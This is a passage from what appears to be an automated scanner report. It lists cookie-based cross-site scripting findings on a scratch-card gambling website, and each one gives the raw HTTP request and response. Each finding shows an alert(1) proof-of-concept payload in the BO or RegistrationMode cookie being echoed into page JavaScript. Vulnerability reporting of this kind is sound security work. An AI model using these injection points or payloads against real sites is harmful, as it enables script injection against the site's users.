The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6100"-alert(1)-"98a251159eb was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMb6100"-alert(1)-"98a251159eb; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: BO=FMb6100"-alert(1)-"98a251159eb; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMb6100"-alert(1)-"98a251159eb";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.81. http://home.okscratchcards.com/ContactUsMail.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/ContactUsMail.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ced5"-alert(1)-"413d8871f9d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM8ced5"-alert(1)-"413d8871f9d; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM8ced5"-alert(1)-"413d8871f9d; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:22 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 42312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM8ced5"-alert(1)-"413d8871f9d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.82. http://home.okscratchcards.com/FairPlay.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/FairPlay.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5d81"-alert(1)-"17298092768 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMe5d81"-alert(1)-"17298092768; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: BO=FMe5d81"-alert(1)-"17298092768; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:52 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMe5d81"-alert(1)-"17298092768";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.83. http://home.okscratchcards.com/FairPlay.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/FairPlay.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce8fc"-alert(1)-"38f2ab8268e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /FairPlay.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMce8fc"-alert(1)-"38f2ab8268e; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMce8fc"-alert(1)-"38f2ab8268e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMce8fc"-alert(1)-"38f2ab8268e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.84. http://home.okscratchcards.com/PlayersClub.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ede9a"-alert(1)-"527fff7e23e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMede9a"-alert(1)-"527fff7e23e; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: BO=FMede9a"-alert(1)-"527fff7e23e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMede9a"-alert(1)-"527fff7e23e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.85. http://home.okscratchcards.com/PlayersClub.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9953"-alert(1)-"b55f2d4f8e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /PlayersClub.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMa9953"-alert(1)-"b55f2d4f8e; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMa9953"-alert(1)-"b55f2d4f8e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMa9953"-alert(1)-"b55f2d4f8e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.86. http://home.okscratchcards.com/Promotions.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f142"-alert(1)-"53426c7c4b6 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM4f142"-alert(1)-"53426c7c4b6; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: BO=FM4f142"-alert(1)-"53426c7c4b6; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4f142"-alert(1)-"53426c7c4b6";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.87. http://home.okscratchcards.com/Promotions.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51939"-alert(1)-"91ead81e5ee was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Promotions.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM51939"-alert(1)-"91ead81e5ee; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM51939"-alert(1)-"91ead81e5ee; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM51939"-alert(1)-"91ead81e5ee";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.88. http://home.okscratchcards.com/Responsible.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1ace"-alert(1)-"2c707f54abb was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMa1ace"-alert(1)-"2c707f54abb; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: BO=FMa1ace"-alert(1)-"2c707f54abb; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40941

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMa1ace"-alert(1)-"2c707f54abb";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.89. http://home.okscratchcards.com/Responsible.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c84ee"-alert(1)-"d1b4367f894 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Responsible.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
